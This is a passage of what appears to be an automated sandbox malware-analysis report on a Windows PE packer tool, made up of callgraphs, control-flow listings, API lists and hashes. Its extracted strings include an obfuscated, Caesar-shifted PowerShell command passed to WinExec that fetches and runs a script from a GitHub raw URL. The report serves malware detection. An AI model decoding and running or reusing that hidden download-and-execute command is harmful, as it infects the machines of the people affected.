7ff68ef3126d memmove memmove UnmapViewOfFile 1892->1893 1895 7ff68ef31397 CloseHandle 1893->1895 1896 7ff68ef3138a CloseHandle 1893->1896 1895->1881 1896->1895 1898 7ff68ef31c09 1897->1898 1899 7ff68ef31bc0 1898->1899 1900 7ff68ef31ec8 IsProcessorFeaturePresent 1898->1900 1899->1841 1901 7ff68ef31ee0 1900->1901 1927 7ff68ef31f9c RtlCaptureContext 1901->1927 1906->1851 1907->1866 1909 7ff68ef36ced 1908->1909 1910 7ff68ef36d91 memset 1909->1910 1911 7ff68ef36db3 1909->1911 1910->1909 1911->1872 1913 7ff68ef36eff 1912->1913 1917 7ff68ef36f65 1913->1917 1918 7ff68ef362b0 1913->1918 1915 7ff68ef362b0 memmove 1916 7ff68ef36f13 1915->1916 1916->1915 1916->1917 1917->1874 1920 7ff68ef362d5 1918->1920 1919 7ff68ef36394 1919->1916 1920->1919 1922 7ff68ef33ac0 1920->1922 1923 7ff68ef33aea 1922->1923 1926 7ff68ef33b1c 1922->1926 1923->1920 1924 7ff68ef343be memmove 1924->1926 1925 7ff68ef33d9f 1925->1920 1926->1924 1926->1925 1928 7ff68ef31fb6 RtlLookupFunctionEntry 1927->1928 1929 7ff68ef31fcc RtlVirtualUnwind 1928->1929 1930 7ff68ef31ef3 1928->1930 1929->1928 1929->1930 1931 7ff68ef31e94 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 1930->1931 2014 7ff68ef31ce8 2018 7ff68ef32514 SetUnhandledExceptionFilter 2014->2018 1966 7ff68ef32c90 1967 7ff68ef32c99 1966->1967 1968 7ff68ef32ca0 malloc 1966->1968 1967->1968 1969 7ff68ef37dd0 1970 7ff68ef37de0 1969->1970 1971 7ff68ef38a30 memmove 1970->1971 1972 7ff68ef37e66 1970->1972 1971->1970 2019 7ff68ef31070 2020 7ff68ef3108d realloc memmove 2019->2020 2021 7ff68ef310c3 2019->2021 2020->2021 2022 7ff68ef32cb0 2023 7ff68ef32cb9 2022->2023 2024 7ff68ef32cc0 free 2022->2024 2023->2024 2025 7ff68ef330f0 strncmp 2026 7ff68ef3311a 2025->2026 2027 7ff68ef37cf0 2028 7ff68ef37d0d 2027->2028 2031 7ff68ef37d36 2027->2031 2029 7ff68ef37d29 2028->2029 2030 7ff68ef38a30 memmove 2028->2030 2030->2029 2032 7ff68ef37db9 2031->2032 2033 7ff68ef38a30 memmove 2031->2033 2033->2032 2034 7ff68ef31e32 2035 7ff68ef324c0 GetModuleHandleW 2034->2035 2036 7ff68ef31e39 2035->2036 2037 7ff68ef31e78 _exit 2036->2037 2038 7ff68ef31e3d 2036->2038

                                                                Callgraph

                                                                • Executed
                                                                • Not Executed
                                                                • Opacity -> Relevance
                                                                • Disassembly available
                                                                callgraph 0 Function_00007FF68EF32238 83 Function_00007FF68EF321FC 0->83 1 Function_00007FF68EF37440 58 Function_00007FF68EF35DD0 1->58 104 Function_00007FF68EF33320 1->104 115 Function_00007FF68EF33430 1->115 2 Function_00007FF68EF38F40 3 Function_00007FF68EF38940 4 Function_00007FF68EF38E40 5 Function_00007FF68EF3234C 6 Function_00007FF68EF3204C 81 Function_00007FF68EF325F8 6->81 107 Function_00007FF68EF32320 6->107 7 Function_00007FF68EF32250 8 Function_00007FF68EF31450 70 Function_00007FF68EF313E0 8->70 9 Function_00007FF68EF36E50 72 Function_00007FF68EF38EE0 9->72 10 Function_00007FF68EF32950 11 Function_00007FF68EF32D50 12 Function_00007FF68EF38050 109 Function_00007FF68EF39120 12->109 119 Function_00007FF68EF38A30 12->119 13 Function_00007FF68EF38F50 14 Function_00007FF68EF38850 14->119 15 Function_00007FF68EF32358 16 Function_00007FF68EF32360 17 Function_00007FF68EF33160 18 Function_00007FF68EF32A60 60 Function_00007FF68EF36ED0 18->60 67 Function_00007FF68EF36CE0 18->67 84 Function_00007FF68EF37C00 18->84 102 Function_00007FF68EF37520 18->102 19 Function_00007FF68EF37760 39 Function_00007FF68EF376A0 19->39 20 Function_00007FF68EF32960 33 Function_00007FF68EF35F90 20->33 59 Function_00007FF68EF32CD0 20->59 96 Function_00007FF68EF32D10 20->96 21 Function_00007FF68EF38B60 22 Function_00007FF68EF38F60 23 Function_00007FF68EF32368 24 Function_00007FF68EF31070 25 Function_00007FF68EF32370 25->23 26 Function_00007FF68EF37E80 41 Function_00007FF68EF384A0 26->41 26->109 26->119 27 Function_00007FF68EF31E80 27->7 28 Function_00007FF68EF36F80 103 Function_00007FF68EF35720 28->103 29 Function_00007FF68EF32580 30 Function_00007FF68EF39080 31 Function_00007FF68EF32088 31->25 57 Function_00007FF68EF328C4 31->57 32 Function_00007FF68EF32C90 34 Function_00007FF68EF35190 68 Function_00007FF68EF378E0 34->68 35 Function_00007FF68EF38390 35->109 35->119 36 Function_00007FF68EF31E94 37 Function_00007FF68EF39396 38 Function_00007FF68EF31F9C 40 Function_00007FF68EF355A0 40->39 42 Function_00007FF68EF321A5 43 Function_00007FF68EF321AC 43->57 44 Function_00007FF68EF362B0 44->19 44->34 44->39 44->40 53 Function_00007FF68EF339C0 44->53 55 Function_00007FF68EF33AC0 44->55 44->58 44->68 44->104 105 Function_00007FF68EF37820 44->105 106 Function_00007FF68EF35E20 44->106 114 Function_00007FF68EF37630 44->114 44->115 45 Function_00007FF68EF379B0 45->19 45->39 45->58 46 Function_00007FF68EF314B0 75 Function_00007FF68EF313F0 46->75 47 Function_00007FF68EF37CB0 48 Function_00007FF68EF32CB0 49 Function_00007FF68EF393B4 50 Function_00007FF68EF325BC 51 Function_00007FF68EF329C0 71 Function_00007FF68EF32FE0 51->71 52 Function_00007FF68EF360C0 52->1 52->4 52->28 118 Function_00007FF68EF38C30 52->118 53->39 53->45 54 Function_00007FF68EF35EC0 55->54 63 Function_00007FF68EF354D0 55->63 55->68 93 Function_00007FF68EF35F10 55->93 94 Function_00007FF68EF33210 55->94 56 Function_00007FF68EF324C0 76 Function_00007FF68EF35BF0 58->76 60->44 60->52 61 Function_00007FF68EF321D0 61->107 62 Function_00007FF68EF35FD0 64 Function_00007FF68EF328D0 65 Function_00007FF68EF37DD0 65->109 65->119 66 Function_00007FF68EF331D2 67->21 67->102 69 Function_00007FF68EF310E0 86 Function_00007FF68EF31C00 69->86 73 Function_00007FF68EF392E4 91 Function_00007FF68EF39304 73->91 74 Function_00007FF68EF31CE8 82 Function_00007FF68EF322FC 74->82 99 Function_00007FF68EF32514 74->99 75->70 77 Function_00007FF68EF328F0 77->47 78 Function_00007FF68EF32EF0 79 Function_00007FF68EF330F0 80 Function_00007FF68EF37CF0 80->41 80->119 85 Function_00007FF68EF31000 86->36 86->38 87 Function_00007FF68EF32300 88 Function_00007FF68EF32D01 89 Function_00007FF68EF38600 89->3 89->119 90 Function_00007FF68EF31D04 90->6 90->15 90->16 90->25 90->43 90->56 90->61 98 Function_00007FF68EF32010 90->98 100 Function_00007FF68EF32114 90->100 113 Function_00007FF68EF31530 90->113 92 Function_00007FF68EF32308 95 Function_00007FF68EF32A10 95->9 97 Function_00007FF68EF32310 98->57 101 Function_00007FF68EF38120 101->41 101->109 101->119 102->62 105->39 106->39 108 Function_00007FF68EF31C20 108->0 108->5 108->25 108->29 108->31 108->82 108->87 108->92 108->97 108->107 110 Function_00007FF68EF32324 108->110 116 Function_00007FF68EF32330 108->116 111 Function_00007FF68EF32524 112 Function_00007FF68EF32328 113->8 113->18 113->20 113->46 113->51 113->69 113->75 113->86 113->95 114->39 116->70 116->112 117 Function_00007FF68EF33030 119->30 120 Function_00007FF68EF38F30 121 Function_00007FF68EF31E32 121->56

                                                                Executed Functions

                                                                Function 00007FF68EF31530 Relevance: 117.6, APIs: 35, Strings: 32, Instructions: 393fileprocessstringCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 7ff68ef31530-7ff68ef3158c 1 7ff68ef31590-7ff68ef31596 0->1 2 7ff68ef31598-7ff68ef315b0 1->2 3 7ff68ef315b2-7ff68ef315b8 1->3 4 7ff68ef315d7-7ff68ef315ee 2->4 3->4 5 7ff68ef315ba-7ff68ef315d3 3->5 4->1 6 7ff68ef315f0-7ff68ef31609 4->6 5->4 7 7ff68ef31610-7ff68ef31617 6->7 7->7 8 7ff68ef31619-7ff68ef31635 malloc 7->8 9 7ff68ef31640-7ff68ef3164c 8->9 9->9 10 7ff68ef3164e 9->10 11 7ff68ef31652-7ff68ef3165a 10->11 11->11 12 7ff68ef3165c-7ff68ef3167d 11->12 13 7ff68ef31680-7ff68ef31688 12->13 13->13 14 7ff68ef3168a-7ff68ef316ac 13->14 15 7ff68ef316b0-7ff68ef316b8 14->15 15->15 16 7ff68ef316ba-7ff68ef316c7 15->16 17 7ff68ef316d0-7ff68ef316de 16->17 17->17 18 7ff68ef316e0-7ff68ef31705 WinExec free strrchr 17->18 19 7ff68ef31707-7ff68ef3170a 18->19 20 7ff68ef3170c 18->20 21 7ff68ef3170f-7ff68ef31712 19->21 20->21 22 7ff68ef3173b 21->22 23 7ff68ef31714-7ff68ef3172a call 7ff68ef313f0 * 2 21->23 25 7ff68ef3173d-7ff68ef31744 22->25 26 7ff68ef3177a 22->26 39 7ff68ef3172f-7ff68ef31736 23->39 29 7ff68ef31746-7ff68ef3174a 25->29 30 7ff68ef3176e-7ff68ef31775 call 7ff68ef313f0 25->30 27 7ff68ef3177d-7ff68ef31780 26->27 31 7ff68ef317a7-7ff68ef317e9 call 7ff68ef313f0 CreateFileA 27->31 32 7ff68ef31782-7ff68ef3178c 27->32 34 7ff68ef3174c-7ff68ef31750 29->34 35 7ff68ef31752-7ff68ef31755 29->35 30->26 46 7ff68ef3180c-7ff68ef31850 GetFileSize malloc call 7ff68ef39247 ReadFile 31->46 47 7ff68ef317eb-7ff68ef31807 GetLastError call 7ff68ef313f0 31->47 37 7ff68ef317a1-7ff68ef317a3 32->37 38 7ff68ef3178e-7ff68ef31795 32->38 34->26 34->35 35->30 41 7ff68ef31757-7ff68ef3175b 35->41 37->31 38->37 42 7ff68ef31797-7ff68ef3179f 38->42 43 7ff68ef31ba7 call 7ff68ef313f0 39->43 41->30 45 7ff68ef3175d-7ff68ef31761 41->45 42->37 51 7ff68ef31bac 43->51 45->30 49 7ff68ef31763-7ff68ef3176c 45->49 57 7ff68ef31852-7ff68ef3186e GetLastError call 7ff68ef313f0 46->57 58 7ff68ef31873-7ff68ef31883 CloseHandle 46->58 47->51 49->27 54 7ff68ef31bb1-7ff68ef31be0 call 7ff68ef31c00 51->54 57->51 58->51 59 7ff68ef31889-7ff68ef3188b 58->59 59->51 63 7ff68ef31891-7ff68ef3189c call 7ff68ef314b0 59->63 63->51 66 7ff68ef318a2-7ff68ef318ad call 7ff68ef314b0 63->66 69 7ff68ef31ba0 66->69 70 7ff68ef318b3-7ff68ef318b6 66->70 69->43 70->51 71 7ff68ef318bc-7ff68ef318cb call 7ff68ef313f0 70->71 74 7ff68ef31948-7ff68ef3194b 71->74 75 7ff68ef318cd-7ff68ef31906 call 7ff68ef313f0 call 7ff68ef31450 71->75 76 7ff68ef31a1a-7ff68ef31a60 call 7ff68ef313f0 CreateFileA 74->76 77 7ff68ef31951-7ff68ef31954 74->77 92 7ff68ef3190d-7ff68ef3191f CopyFileA 75->92 76->51 88 7ff68ef31a66-7ff68ef31ab9 call 7ff68ef313f0 * 2 call 7ff68ef32960 call 7ff68ef329c0 76->88 80 7ff68ef31956-7ff68ef319ad call 7ff68ef313f0 call 7ff68ef31450 77->80 81 7ff68ef319b2-7ff68ef31a0e call 7ff68ef313f0 call 7ff68ef31450 77->81 80->92 81->76 107 7ff68ef31b16-7ff68ef31b30 call 7ff68ef32a10 call 7ff68ef313f0 88->107 108 7ff68ef31abb-7ff68ef31b04 call 7ff68ef32a60 88->108 92->76 96 7ff68ef31925-7ff68ef31943 GetLastError call 7ff68ef313f0 92->96 96->54 107->54 113 7ff68ef31b06-7ff68ef31b0e 108->113 114 7ff68ef31b32-7ff68ef31b85 call 7ff68ef32a10 call 7ff68ef313f0 * 3 call 7ff68ef310e0 108->114 113->107 116 7ff68ef31b10 free 113->116 128 7ff68ef31b87-7ff68ef31b8e 114->128 129 7ff68ef31b90-7ff68ef31b9e call 7ff68ef313f0 114->129 116->107 128->43 129->54
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: printf$File$ErrorLastmalloc$Createfree$CloseCopyExecHandleReadSize__acrt_iob_func__stdio_common_vfprintfmemsetstrrchr
                                                                • String ID: [ DONE ] $%s%s$.\DllPP64Stub.dll$.\H_PP64Stub.exe$.\unpacker.exe$CopyFileA$CreateFileA$DllPP64Stub.dll$H_PP64Stub.exe$ReadFile$[!] Compression Failed With Error : %d $[!] "%s" [ FAILED ] %d $[!] Failed To Create A New Section $[#] Output : $[#] Usage : %s <Input x64 exe> <*Output*>$[+] Compressed Ratio : %d%% $[+] Final Pe Size : %d $[+] Section .ATOM is Created Containing The Input Packed Pe $[i] "%s" Is Invalid Input, Defaulting To Outputting Exe File ... $[i] 32-PE Input Detected ... [ NOT-SUPPORTED ]$[i] 64-PE Input Detected ... [ SUPPORTED ]$[i] Generating Dll Output ... $[i] Generating Exe Output ... $[i] Generating No Console Exe Output ... $[i] Packing ... $[i] Reading " %s " ... $[i] Reading The Loader "%s" ...$hell.e$hoo -zlqgrzvwboh k -dujv {lha(lzu udz.jlwkxexvhufrqwhqw.frp/Qhwk3Q/qd9rz3495udbjzl4jbukxdzhudzhud/uhiv/khdgv/pdlq/fu_dvp_fubswhu.waw -xvhedvlfsduvlqj)}$powers$stublocation\$unpacker.exe
                                                                • API String ID: 2980077734-226719752
                                                                • Opcode ID: d3b358ed62c6a033b7745128fd11dd1cfa4d6dbe723572bb53af89f39f3074c6
                                                                • Instruction ID: 599c47d309f9f278c556275727100eb7cd8ddbead7dd6ba1058d20813a7a504c
                                                                • Opcode Fuzzy Hash: d3b358ed62c6a033b7745128fd11dd1cfa4d6dbe723572bb53af89f39f3074c6
                                                                • Instruction Fuzzy Hash: 9312BF21A0CA82C5EB11CFA6E8402B977A1FF65784F44423AF94EC36A5EF3CE545C702
                                                                Function 00007FF68EF31D04 Relevance: 12.1, APIs: 8, Instructions: 94COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                                • String ID:
                                                                • API String ID: 1133592946-0
                                                                • Opcode ID: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                • Instruction ID: c83f1681caf9755fb0c45573cdc18a4ad7bb87fee472957dda44d6c7026c225d
                                                                • Opcode Fuzzy Hash: 1cbc0dcdf469d96383d55006a5203152253f0f20c1a05c1544fc42c63d5dbbda
                                                                • Instruction Fuzzy Hash: 9E31F521A0CA03C1FB64ABE594113BA2391BFA6784F44443DFA4EC72A7DE3DE845C352

                                                                Non-executed Functions

                                                                Function 00007FF68EF310E0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 177fileCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: File$CloseHandle$View$CreateMappingUnmapmemmove$Size
                                                                • String ID: .ATOM$@
                                                                • API String ID: 446061512-930667443
                                                                • Opcode ID: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                • Instruction ID: af3341138dc43da7c8443fe74f989aa07129c393b2203d139f497329a63ff46b
                                                                • Opcode Fuzzy Hash: 4db16023d56813c619b6a560a2264965fcc72533692b26ac0f32b99d66fa7c74
                                                                • Instruction Fuzzy Hash: E6815F72A19A42CAE750CF62E84066A73A0FF99B94F105239FA9DC3B94DF3CE455C701
                                                                Function 00007FF68EF32370 Relevance: 13.6, APIs: 9, Instructions: 71COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                • String ID:
                                                                • API String ID: 313767242-0
                                                                • Opcode ID: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                • Instruction ID: 4eabad754478d5c0de5bd14b012c885ff5e9885b5ad3867b811f2c483b52f34a
                                                                • Opcode Fuzzy Hash: efd1cfd97ab6ddbc734f1008b619de7ec29c4480cf9123f63dd80cdb39ef4dc1
                                                                • Instruction Fuzzy Hash: 66310C72609B81CAEB609FA1E8803ED7364FB94744F44443EEA4E87B99DF38D548C711
                                                                Function 00007FF68EF32250 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                • String ID:
                                                                • API String ID: 2933794660-0
                                                                • Opcode ID: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                • Instruction ID: bbfe6b5216773da170299ad4a6f53afca1be8fb93f395961f61e197a7d904d1a
                                                                • Opcode Fuzzy Hash: d82abbdedb5a10bf1745d74c4b3cb6bc3aa2428d30236cd128df959476fd0043
                                                                • Instruction Fuzzy Hash: D7111862B14F05CAEB008FA1EC542A933A4FB69758F441A39EA6D877A4DF78D198C341
                                                                Function 00007FF68EF33AC0 Relevance: 2.6, APIs: 1, Instructions: 1391COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: edb8eba26a419828462f04bd498d548419ecb844cbcf4a4d4fa9667a7507e451
                                                                • Instruction ID: eec168ef66909a234ee8d52fbff70d2db3fb46a6b04a3b94e19b261430b5bbca
                                                                • Opcode Fuzzy Hash: edb8eba26a419828462f04bd498d548419ecb844cbcf4a4d4fa9667a7507e451
                                                                • Instruction Fuzzy Hash: 4AE2BEB3B14691CBE719CF68D0446AC37A5FBA4B4CF504239EB0A97B48DB39E945CB40
                                                                Function 00007FF68EF362B0 Relevance: .6, Instructions: 635COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2af684903b07895a612a0ff1c83b407c1dec56938cd0142951888f76033b5fba
                                                                • Instruction ID: 2ef4f86e8ba2f2063b6356788339678afc391985b97e1fa4543ec011239fca37
                                                                • Opcode Fuzzy Hash: 2af684903b07895a612a0ff1c83b407c1dec56938cd0142951888f76033b5fba
                                                                • Instruction Fuzzy Hash: 1252E172614682CBE715CF68E4402ADB7A5FBA4B88F444139EB89CB788DF3CE540CB11
                                                                Function 00007FF68EF33430 Relevance: .3, Instructions: 321COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08af3d139c253a12d3d904bb133b7ae44e6467691e30716039f3aac408a3a1f7
                                                                • Instruction ID: c636409ab074ecef2b3ee5e2bd58f6454d4724b962dbfb0f37913ba98672dcbe
                                                                • Opcode Fuzzy Hash: 08af3d139c253a12d3d904bb133b7ae44e6467691e30716039f3aac408a3a1f7
                                                                • Instruction Fuzzy Hash: BB02C4B71115958BC715CF18E5A0BEC7B75F3A9348F644226DBA293B45EB39E228CF00
                                                                Function 00007FF68EF38C30 Relevance: .2, Instructions: 166COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 734b7cc4a1729ccac46801f5ba32c2d2719cea5d53020609d49088e0514a1b82
                                                                • Instruction ID: d51cbd749b5f089ee4cfb10a5ad4979e5ab46ee5afdf4c1c8b17c0a5fffb0120
                                                                • Opcode Fuzzy Hash: 734b7cc4a1729ccac46801f5ba32c2d2719cea5d53020609d49088e0514a1b82
                                                                • Instruction Fuzzy Hash: 7C61AD72A04785CBE768DF69D14026D77A1FB58F88F104139EB4A83B88DF38D896CB41
                                                                Function 00007FF68EF379B0 Relevance: .2, Instructions: 165COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a09f5aa30f9360085c033b6dd99b3d66c76e7e2456d3110ecb487d193e64064e
                                                                • Instruction ID: 67a16e064673c62574cbe17d96a79d403597fea41e6fb41886e316290fb55fd4
                                                                • Opcode Fuzzy Hash: a09f5aa30f9360085c033b6dd99b3d66c76e7e2456d3110ecb487d193e64064e
                                                                • Instruction Fuzzy Hash: ED5103737106568BD709DF69D4406AE37A5FBA4B88F918138EA08C77C8EE3CD942C741
                                                                Function 00007FF68EF35BF0 Relevance: .1, Instructions: 130COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb1e7ff820d716487da5ad0f80d5ff8bc6d3fddd02406cc623040adddaa62674
                                                                • Instruction ID: f89bcdf871018cf770768daa460085e160065bdce477717f48d8cf8545e61122
                                                                • Opcode Fuzzy Hash: bb1e7ff820d716487da5ad0f80d5ff8bc6d3fddd02406cc623040adddaa62674
                                                                • Instruction Fuzzy Hash: 3041E473A289A587EB14CF18E804BAD7761F794784F946035EF4B53B84DB39E841CB00
                                                                Function 00007FF68EF32EF0 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1376839249.00007FF68EF31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68EF30000, based on PE: true
                                                                • Associated: 00000000.00000002.1376823110.00007FF68EF30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376891272.00007FF68EF3A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1376912424.00007FF68EF3D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff68ef30000_OSLdZanXNc.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 364e2c2454f659e17b929bd6d5a310316bd8dc7b61ece90421b3e3f6c55aecc1
                                                                • Instruction ID: 12d17718fed8b4d197be912a8cdc2836ddfc7770dfd4d08ed81c905a8800e740
